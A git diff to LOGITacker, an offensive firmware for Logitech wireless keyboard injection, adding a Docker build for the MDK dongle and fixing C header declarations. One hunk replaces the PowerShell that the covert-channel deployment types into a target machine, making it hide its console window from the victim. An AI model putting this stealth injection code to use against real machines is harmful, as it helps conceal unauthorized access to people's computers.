diff --git a/Dockerfile.mdk-dongle b/Dockerfile.mdk-dongle new file mode 100644 index 0000000..9991411 --- /dev/null +++ b/Dockerfile.mdk-dongle @@ -0,0 +1,31 @@ +# Dockerfile.mdk-dongle + +FROM kalilinux/kali-rolling + +WORKDIR /root + +# Install toolchain and dependencies +RUN apt-get update && apt-get -y install wget git gcc-arm-none-eabi unzip sed make python3 + +# Fetch nRF5 SDK and LOGITacker repo +RUN wget https://www.nordicsemi.com/-/media/Software-and-other-downloads/SDKs/nRF5/Binaries/nRF5SDK153059ac345.zip \ + && unzip nRF5SDK153059ac345.zip \ + && git clone https://github.com/LuemmelSec/LOGITacker + +# Patch SDK for local toolchain +RUN sed -i "s#^GNU_INSTALL_ROOT.*#GNU_INSTALL_ROOT ?= /usr/bin/#g" \ + nRF5_SDK_15.3.0_59ac345/components/toolchain/gcc/Makefile.posix + +# Build only the MakerDiary MDK Dongle target +WORKDIR /root/LOGITacker/mdk-dongle/blank/armgcc +RUN sed -i "s#^SDK_ROOT.*#SDK_ROOT := /root/nRF5_SDK_15.3.0_59ac345#g" Makefile && make + +# Fetch UF2 conversion script +WORKDIR /root +RUN wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2conv.py \ + && wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2families.json + +# Create build dir and convert HEX to UF2 +RUN mkdir build \ + && cp LOGITacker/mdk-dongle/blank/armgcc/_build/logitacker_mdk_dongle.hex build \ + && python3 uf2conv.py build/logitacker_mdk_dongle.hex -c -f 0xADA52840 -o build/logitacker_mdk_dongle.uf2 diff --git a/build_mdk_dongle_firmware.sh b/build_mdk_dongle_firmware.sh new file mode 100644 index 0000000..899c8b4 --- /dev/null +++ b/build_mdk_dongle_firmware.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +IMAGE_NAME="logitacker-mdk" +CONTAINER_NAME="logitacker-mdk-container" +OUTPUT_DIR="$(pwd)/build" + +# Build Docker image +docker build -f Dockerfile.mdk-dongle -t $IMAGE_NAME . + +# Create a container and copy the firmware out +docker create --name $CONTAINER_NAME $IMAGE_NAME +mkdir -p "$OUTPUT_DIR" +docker cp $CONTAINER_NAME:/root/build "$OUTPUT_DIR" +docker rm $CONTAINER_NAME + +echo "UF2 file located at: $OUTPUT_DIR/build/logitacker_mdk_dongle.uf2" diff --git a/logitacker/logitacker.c b/logitacker/logitacker.c index dc75508..4d8472c 100644 --- a/logitacker/logitacker.c +++ b/logitacker/logitacker.c @@ -31,6 +31,7 @@ #include "nrf_log.h" #include "logitacker_processor_covert_channel.h" +char g_logitacker_cli_name[32]; NRF_LOG_MODULE_REGISTER(); APP_TIMER_DEF(m_timer_next_tx_action); diff --git a/logitacker/logitacker.h b/logitacker/logitacker.h index 3af2dfd..e2e6980 100644 --- a/logitacker/logitacker.h +++ b/logitacker/logitacker.h @@ -47,7 +47,7 @@ typedef enum { LOGITACKER_MODE_IDLE } logitacker_mode_t; -char g_logitacker_cli_name[32]; +extern char g_logitacker_cli_name[32]; uint32_t logitacker_init(); @@ -80,4 +80,4 @@ uint32_t logitacker_covert_channel_push_data(covert_channel_payload_data_t const -#endif \ No newline at end of file +#endif diff --git a/logitacker/logitacker_cli.c b/logitacker/logitacker_cli.c index 342c09e..3d93248 100644 --- a/logitacker/logitacker_cli.c +++ b/logitacker/logitacker_cli.c @@ -49,9 +49,9 @@ void deploy_covert_channel_script(bool hide) { logitacker_script_engine_append_task_delay(2000); if (hide) { - logitacker_script_engine_append_task_type_string("$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);"); - logitacker_script_engine_append_task_type_string("$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName(\"WindowsBase\")).GetType(\"MS.Win32.UnsafeNativeMethods\"))::SetWindowPos($hw,$i,0,0,100,100,16512)\n"); - logitacker_script_engine_append_task_delay(500); + logitacker_script_engine_append_task_type_string("Add-Type -Namespace Win32 -Name Api -MemberDefinition '[DllImport(\"kernel32.dll\")] public static extern IntPtr GetConsoleWindow();"); + logitacker_script_engine_append_task_type_string("[DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'; $h = [Win32.Api]::GetConsoleWindow(); [Win32.Api]::ShowWindow($h, 0);"); + logitacker_script_engine_append_task_delay(500); } while (strlen(agentscript) >= 128) { diff --git a/logitacker/logitacker_processor_covert_channel.c b/logitacker/logitacker_processor_covert_channel.c index e0c5f7e..64c1a72 100644 --- a/logitacker/logitacker_processor_covert_channel.c +++ b/logitacker/logitacker_processor_covert_channel.c @@ -526,7 +526,7 @@ void processor_covert_channel_esb_handler_func_(logitacker_processor_covert_chan switch (p_esb_event->evt_id) { case NRF_ESB_EVENT_TX_FAILED: - NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit"); + // NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit"); // retransmit nrf_esb_start_tx(); break; @@ -588,4 +588,4 @@ logitacker_processor_t * new_processor_covert_channel(uint8_t *rf_address, app_t return contruct_processor_covert_channel_instance(&m_static_covert_channel_ctx); -} \ No newline at end of file +} diff --git a/logitacker/logitacker_usb.c b/logitacker/logitacker_usb.c index d5291de..b46c0b8 100644 --- a/logitacker/logitacker_usb.c +++ b/logitacker/logitacker_usb.c @@ -14,7 +14,6 @@ #include "logitacker_script_engine.h" #include "logitacker_options.h" - NRF_LOG_MODULE_REGISTER(); uint8_t tmp_in_rep_buf[4][LOGITACKER_USB_HID_GENERIC_IN_REPORT_MAXSIZE]; diff --git a/logitacker/logitacker_usb.h b/logitacker/logitacker_usb.h index 52f33b4..9f67279 100644 --- a/logitacker/logitacker_usb.h +++ b/logitacker/logitacker_usb.h @@ -166,7 +166,7 @@ typedef enum { } -const app_usbd_hid_generic_t m_app_hid_generic; +extern const app_usbd_hid_generic_t m_app_hid_generic; // User event handler.